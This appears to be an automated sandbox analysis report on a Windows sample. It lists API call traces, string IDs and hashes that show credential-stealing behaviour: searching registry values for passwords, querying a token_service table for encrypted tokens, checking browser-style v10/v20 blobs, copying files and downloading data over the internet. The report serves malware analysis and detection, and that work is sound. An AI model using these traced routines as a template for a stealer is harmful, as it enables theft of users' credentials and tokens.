                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: OpenProcesslstrcpymemset
                                                  • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                  • API String ID: 224852652-2614523144
                                                  • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                  • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                                  • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                  • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                                  APIs
                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00B477A9
                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B477E6
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B4786A
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B47871
                                                  • wsprintfA.USER32 ref: 00B478A7
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                  • String ID: :$C$\$B
                                                  • API String ID: 1544550907-183544611
                                                  • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                  • Instruction ID: d271cdc28da31b9d95a620b7cd225abca80fc798be38dfaa62959b22786e96ae
                                                  • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                  • Instruction Fuzzy Hash: DC416BB1D44258ABDB10DFA4CC85BEEBBB9EF48700F100199F509A7280DB756B84DBA5
                                                  APIs
                                                    • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                                    • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                    • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                    • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                    • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                    • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                  • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                                  • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                                  • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                                  • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                                  • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                                  • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                                  • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                                  • task.LIBCPMTD ref: 004076FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                  • String ID: :
                                                  • API String ID: 3191641157-3653984579
                                                  • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                  • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                                  • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                  • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                                  APIs
                                                  • lstrcpy.KERNEL32(?,?), ref: 00B41642
                                                    • Part of subcall function 00B49047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B49072
                                                    • Part of subcall function 00B494C7: StrStrA.SHLWAPI(?,?), ref: 00B494D3
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B4167E
                                                    • Part of subcall function 00B494C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 00B494F7
                                                    • Part of subcall function 00B494C7: lstrlen.KERNEL32(?), ref: 00B4950E
                                                    • Part of subcall function 00B494C7: wsprintfA.USER32 ref: 00B4952E
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B416C6
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B4170E
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B41755
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B4179D
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B417E5
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B4182C
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B41874
                                                    • Part of subcall function 00B4AA87: lstrlen.KERNEL32(00B3516C,?,?,00B3516C,00420DDE), ref: 00B4AA92
                                                    • Part of subcall function 00B4AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B4AAEC
                                                  • strtok_s.MSVCRT ref: 00B419B7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                                  • String ID:
                                                  • API String ID: 4276352425-0
                                                  • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                  • Instruction ID: de75b689a45587b37d9b98bcdb9308b3cdad8786bf2cc2108b0b718ceb9ccb00
                                                  • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                  • Instruction Fuzzy Hash: 5F7161B6D50118ABCB14FBA0DC89EEE73B9AFA5300F0449D8F10DA2141EE759B84DF61
                                                  APIs
                                                  • memset.MSVCRT ref: 00407314
                                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                  • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                    • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                                  • task.LIBCPMTD ref: 00407555
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                  • String ID: Password
                                                  • API String ID: 2698061284-3434357891
                                                  • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                  • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                                  • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                  • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                                  APIs
                                                  • lstrcatA.KERNEL32(?,00878FD0,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                                  • lstrcatA.KERNEL32(?,?), ref: 00414820
                                                  • lstrcatA.KERNEL32(?,?), ref: 00414834
                                                  • lstrcatA.KERNEL32(?,00844EA0), ref: 00414847
                                                  • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                                  • lstrcatA.KERNEL32(?,008798B8), ref: 0041486F
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                    • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                    • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                    • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                                    • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                  • String ID: 0aA
                                                  • API String ID: 167551676-2786531170
                                                  • Opcode ID: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                  • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                                  • Opcode Fuzzy Hash: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                  • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00879570,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00879570,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                                  • __aulldiv.LIBCMT ref: 00418172
                                                  • __aulldiv.LIBCMT ref: 00418180
                                                  • wsprintfA.USER32 ref: 004181AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                  • String ID: %d MB$@
                                                  • API String ID: 2886426298-3474575989
                                                  • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                  • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                                  • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                  • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                                  APIs
                                                    • Part of subcall function 00B4AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B4AA4D
                                                    • Part of subcall function 00B34A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B34A51
                                                    • Part of subcall function 00B34A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B34A68
                                                    • Part of subcall function 00B34A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B34A7F
                                                    • Part of subcall function 00B34A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B34AA0
                                                    • Part of subcall function 00B34A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B34AB0
                                                  • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 00B36376
                                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 00B363AE
                                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00B363F6
                                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00B3641A
                                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00B36443
                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B36471
                                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00B364B0
                                                  • InternetCloseHandle.WININET(?), ref: 00B364BA
                                                  • InternetCloseHandle.WININET(00000000), ref: 00B364C7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 4287319946-0
                                                  • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                  • Instruction ID: 724a1198449f3f2a3864aa4eb1b1bff78f30d12c14819fabfb8d3f24ad8ec122
                                                  • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                                  • Instruction Fuzzy Hash: 66514FB5940218BBDB20DF94CC45BEE77B9EB44701F1080D8B605A72C0DB756B89CF95
                                                  APIs
                                                  • memset.MSVCRT ref: 00B44FEE
                                                    • Part of subcall function 00B49047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B49072
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B45017
                                                  • lstrcat.KERNEL32(?,00421000), ref: 00B45034
                                                    • Part of subcall function 00B44B77: wsprintfA.USER32 ref: 00B44B93
                                                    • Part of subcall function 00B44B77: FindFirstFileA.KERNEL32(?,?), ref: 00B44BAA
                                                  • memset.MSVCRT ref: 00B4507A
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B450A3
                                                  • lstrcat.KERNEL32(?,00421020), ref: 00B450C0
                                                    • Part of subcall function 00B44B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00B44BD8
                                                    • Part of subcall function 00B44B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00B44BEE
                                                    • Part of subcall function 00B44B77: FindNextFileA.KERNEL32(000000FF,?), ref: 00B44DE4
                                                    • Part of subcall function 00B44B77: FindClose.KERNEL32(000000FF), ref: 00B44DF9
                                                  • memset.MSVCRT ref: 00B45106
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B4512F
                                                  • lstrcat.KERNEL32(?,00421038), ref: 00B4514C
                                                    • Part of subcall function 00B44B77: wsprintfA.USER32 ref: 00B44C17
                                                    • Part of subcall function 00B44B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 00B44C2C
                                                    • Part of subcall function 00B44B77: wsprintfA.USER32 ref: 00B44C49
                                                    • Part of subcall function 00B44B77: PathMatchSpecA.SHLWAPI(?,?), ref: 00B44C85
                                                    • Part of subcall function 00B44B77: lstrcat.KERNEL32(?,0064A524), ref: 00B44CB1
                                                    • Part of subcall function 00B44B77: lstrcat.KERNEL32(?,00420FF8), ref: 00B44CC3
                                                    • Part of subcall function 00B44B77: lstrcat.KERNEL32(?,?), ref: 00B44CD7
                                                    • Part of subcall function 00B44B77: lstrcat.KERNEL32(?,00420FFC), ref: 00B44CE9
                                                    • Part of subcall function 00B44B77: lstrcat.KERNEL32(?,?), ref: 00B44CFD
                                                    • Part of subcall function 00B44B77: CopyFileA.KERNEL32(?,?,00000001), ref: 00B44D13
                                                    • Part of subcall function 00B44B77: DeleteFileA.KERNEL32(?), ref: 00B44D98
                                                  • memset.MSVCRT ref: 00B45192
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                  • String ID:
                                                  • API String ID: 4017274736-0
                                                  • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                  • Instruction ID: a9a0531f0a175034dbbb14d80e137e2cc1c4be4a9bb0109912894728e5969927
                                                  • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                  • Instruction Fuzzy Hash: 2C41B6B9A402186BDB14F7B0EC47FED7778AF24701F4044D4B685A60C1EEB997D88B92
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 00B48397
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B4839E
                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00B483BF
                                                  • __aulldiv.LIBCMT ref: 00B483D9
                                                  • __aulldiv.LIBCMT ref: 00B483E7
                                                  • wsprintfA.USER32 ref: 00B48413
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                                  • String ID: @
                                                  • API String ID: 2774356765-2766056989
                                                  • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                  • Instruction ID: 3af935f8ecf30e8d9f6c537b5396137516f4c717735f517d7e241ac7f8027f69
                                                  • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                  • Instruction Fuzzy Hash: 53214DB1E44218ABDB00DFD4CC49FAEBBB9FB44B04F104549F605BB2C0C77869008BA5
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                  • API String ID: 1440504306-1079375795
                                                  • Opcode ID: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                  • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                                  • Opcode Fuzzy Hash: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                  • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcess$DefaultLangUser
                                                  • String ID: B
                                                  • API String ID: 1494266314-2248957098
                                                  • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                  • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                                  • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                  • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                                  APIs
                                                  • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                                  • memset.MSVCRT ref: 00409EE8
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                                  • API String ID: 1977917189-1096346117
                                                  • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                  • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                                  • Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                  • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                                  APIs
                                                    • Part of subcall function 00B37537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B375A1
                                                    • Part of subcall function 00B37537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B37618
                                                    • Part of subcall function 00B37537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 00B37674
                                                    • Part of subcall function 00B37537: GetProcessHeap.KERNEL32(00000000,?), ref: 00B376B9
                                                    • Part of subcall function 00B37537: HeapFree.KERNEL32(00000000), ref: 00B376C0
                                                  • lstrcat.KERNEL32(0064A668,004217FC), ref: 00B3786D
                                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 00B378AF
                                                  • lstrcat.KERNEL32(0064A668,00421800), ref: 00B378C1
